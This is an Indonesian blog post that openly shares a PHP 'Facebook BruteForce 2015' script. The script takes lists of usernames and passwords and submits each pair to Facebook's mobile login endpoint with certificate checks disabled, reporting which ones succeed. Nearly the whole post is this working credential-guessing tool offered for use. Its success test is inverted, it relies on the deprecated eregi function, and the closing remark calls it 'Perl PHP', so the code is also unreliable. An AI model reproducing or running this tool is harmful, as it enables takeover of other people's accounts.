Script Facebook BruteForce


          Script Facebook BruteForce





Hellow,
Oke Kali ini saya akan share Script Facebook Bruteforce 2015 :)
Oke Langsung saja Nih scriptnya :



<h3>Script Facebook BruteForce </h3>
<?php
#################################################
#----------------------------------------------#
# Facebook Brute Force 2015                     #
#Coded by : 4127IM  & #M5P    #
#Greetz : All INC-Tools                 #
#www.mau-berbagi-ilmu.blogspot.com                    #
# --------------------------------------------- #
#################################################
@set_time_limit(0);
/* Edited By DeVenom-Phantom */

echo "
<form method='POST'>
<textarea cols='50' class='area'  rows='13' name='username' placeholder='Usernames Lists'></textarea>
<textarea cols='15' class='area'  rows='13' name='password' placeholder='Passwords Lists'></textarea>
<br>
<input type='submit' name='scan' value='Start BruteForce'><br></form>";
if(isset($_POST['scan']) && $_POST['username'] != "" && $_POST['password'] != ""){

#function           
function fbbrute($user,$pass){
$ch = curl_init();     
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
return (eregi('class="s t i u"',$login)) ? true:false;
}

$targets = explode("\n", $_POST['username']);
$pwds = explode("\n", $_POST['password']);

foreach($pwds as $pwd){
foreach($targets as $target){
$check = fbbrute(trim($target),trim($pwd));
if($check == true){
echo "<font color='black'>Failed => $target : $pwd </font><br />";
}else{
echo "<font color='green'>Success => $target : $pwd </font><br />";
}
}

}

}

#NB : Script ini adalah Perl PHP, support pada Hosting yang mengisinkan Perl atau Bot.
Share on :
.